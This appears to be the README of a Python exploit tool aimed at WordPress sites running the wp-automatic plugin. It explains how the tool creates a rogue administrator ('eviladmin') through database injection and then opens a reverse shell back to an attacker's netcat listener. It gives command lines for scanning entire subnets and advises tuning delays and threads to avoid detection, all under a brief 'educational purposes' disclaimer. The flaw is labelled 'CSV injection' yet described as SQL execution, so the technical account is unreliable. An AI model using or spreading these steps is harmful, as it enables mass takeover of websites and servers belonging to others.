This Python script automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries on the WordPress database and gain administrative access.
- Here are some more advanced examples of how you might use the script, assuming you have the proper authorization to test the target systems.
- 
Scanning a subnet: If you want to scan a subnet for vulnerable WordPress installations, you can use the --subnetoption. For example:python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0This command will scan the 192.168.1.0/24subnet for WordPress sites with the vulnerable WP Automatic plugin, and attempt to exploit them using the provided listener settings.
- 
Customizing the delay: The delay between requests can be adjusted using the --delayoption. A higher delay may help avoid detection or rate limiting, while a lower delay can speed up the exploitation process. For example:python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5This command will use a delay of 2.5 seconds between requests. 
- 
Using a remote listener: If your listener is set up on a remote machine, you can specify its IP address and port using the --lhostand--lportoptions. For example:python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0This command will connect back to a listener on 192.168.1.100:8080.
- 
Increasing the number of threads: You can increase the number of threads used by the script with the --threadsoption. This can speed up the exploitation process, but may also increase the likelihood of detection or cause issues with rate limiting. For example:python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0This command will use 20 threads for exploitation. 
- Python 3.x
- requestslibrary (install via- pip install requests)
- Netcat (for setting up a listener to connect to the reverse shell)
- Replace the domainvariable in the script with the URL of the target WordPress site.
- Run the Python script.
- Once the script is executed, it will create a new admin user named eviladmin, set the password, and assign administrative privileges.
- It will then upload and execute a reverse shell payload on the target server.
- Set up a netcat listener to connect to the reverse shell using the specified port.
Note: Ensure that you have proper authorization and permissions before running this script, as it can lead to security vulnerabilities and legal consequences if misused.
This script is provided for educational and testing purposes only. The author assumes no liability for any unauthorized or illegal use of this script. Use it at your own risk.